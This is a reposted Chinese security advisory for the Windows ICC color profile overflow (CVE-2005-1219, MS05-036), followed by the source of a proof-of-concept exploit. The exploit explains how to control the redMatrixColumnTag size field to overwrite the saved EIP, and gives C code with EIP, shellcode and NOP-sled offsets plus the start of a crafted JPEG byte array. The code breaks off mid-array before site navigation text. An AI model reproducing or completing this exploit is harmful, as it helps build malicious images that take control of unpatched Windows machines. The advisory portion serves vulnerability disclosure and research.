Microsoft Windows颜色管理模块ICC配置文件溢出…
2008-04-09 04:18:16来源:互联网 阅读 ()
发布日期:2005-07-13
更新日期:2005-07-13
受影响系统:
Microsoft Windows XP SP2描述:
Microsoft Windows XP SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
BUGTRAQ ID: 14214
CVE(CAN) ID: CVE-2005-1219
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft颜色管理模块中存在远程代码执行漏洞,成功利用这个漏洞的攻击者可以完全控制受影响的系统.
起因是它处理ICC配置文件格式标签验证时存在溢出。攻击者可以通过创建恶意的图形文件来利用这个漏洞。如果用户访问了恶意的Web站点或浏览了恶意邮件消息的话,该文件就能导致远程执行代码。
<*来源:Shih-hao Weng
snooq (jinyean@hotmail.com)
链接:http://www.microsoft.com/technet/security/Bulletin/MS05-036.mspx
http://www.us-cert.gov/cas/techalerts/TA05-193A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Author: snooq [http://www.redpuffer.net/snooq/web/]
* Date: 21 July 2005
*
* When I looked at the PoC posted on bugtraq....
* I was basically quite disappointed. The 'PoC' fixed
* 'tag count' to a large number.. but this code path
* does not seem to be exploitable... GetColorProfileElement
* crashes becoz it hits the page boundary while enumerating
* the tags...this simply triggers 'Access Violation' before
* we even overwrite anything in the memory...
*
* well.. at least that is what I see in SoftICE... tell me if
* it's wrong...
*
* anyway.. I decided to dig deeper...and I was lucky enuff
* to uncover a more promising path...
*
* by controlling the size field of 'redMatrixColumnTag'...
* we are able to trick 'GetColorProfileElement' to overwrite
* the stack content...
*
* the offending code looks like this:
*
* .text:73B32144 mov esi, eax
* .text:73B32146 mov eax, ecx
* .text:73B32148 shr ecx, 2
* .text:73B3214B rep movsd
* .text:73B3214D mov ecx, eax
* .text:73B3214F and ecx, 3
* .text:73B32152 rep movsb
* .text:73B32154 mov ecx, [ebp lp]
* .text:73B32157 mov [ecx], eax
*
* ESI points to 'redMatrixColumnTag' data
* EDI points to a buffer on the stack
* ECX is what we can control (the size field)
*
* At 73B3214B, it will overflow to the adjacent stack frames
* if ECX is large enuff. As a result, we are able to overwrite
* the saved EIP value of icm32.671123E7...
*
* the onli prob now.. is I hav not found a reliable
* 'jmp' address... or perhaps.. try SEH trick instead??
*
* please tell me about it if u have a more reliable way of
* exploiting this... while I am heading to my bed now.
*
* nonethelss.. this should be good enuff to reproduce the
* bug.. enjoy!
*
* Greetz:
* =======
* - sk, ck, eugene, nam, jeff, ken, andre, sugi..etc
* - julian and chris from thinkSECURE
*/
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#define TARGET 1
#define NOP 0x90
#define FNAME "snooq.jpg"
#define BSIZE sizeof(buff)-1
#define EIP_OFFSET 0x336
#define SC_OFFSET 0x246
#define NOP_OFFSET 0x218
#define NOP_SIZE 0x112
/*
* Silly JPEG stuffed with ICC profile.........
*/
char buff[]="\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x00\x01\x00\x60"
"\x00\x60\x00\x00\xFF\xE2\x0C\x58\x49\x43\x43\x5F\x50\x52\x4F\x46"
"\x49\x4C\x45\x00\x01\x01\x00\x00\x0C\x48\x4C\x69\x6E\x6F\x02\x10"
"\x00\x00\x6D\x6E\x74\x72\x52\x47\x42\x20\x58\x59\x5A\x20\x07\xCE"
"\x00\x02\x00\x09\x00\x06\x00\x31\x00\x00\x61\x63\x73\x70\x4D\x53"
"\x46\x54\x00\x00\x00\x00\x49\x45\x43\x20\x73\x52\x47\x42\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF6\xD6\x00\x01"
"\x00\x00\x00\x00\xD3\x2D\x48\x50\x20\x20\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x63\x70\x72\x74\x00\x00"
"\x01\x50\x00\x00\x00\x33\x64\x65\x73\x63\x00\x00\x01\x84\x00\x00"
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash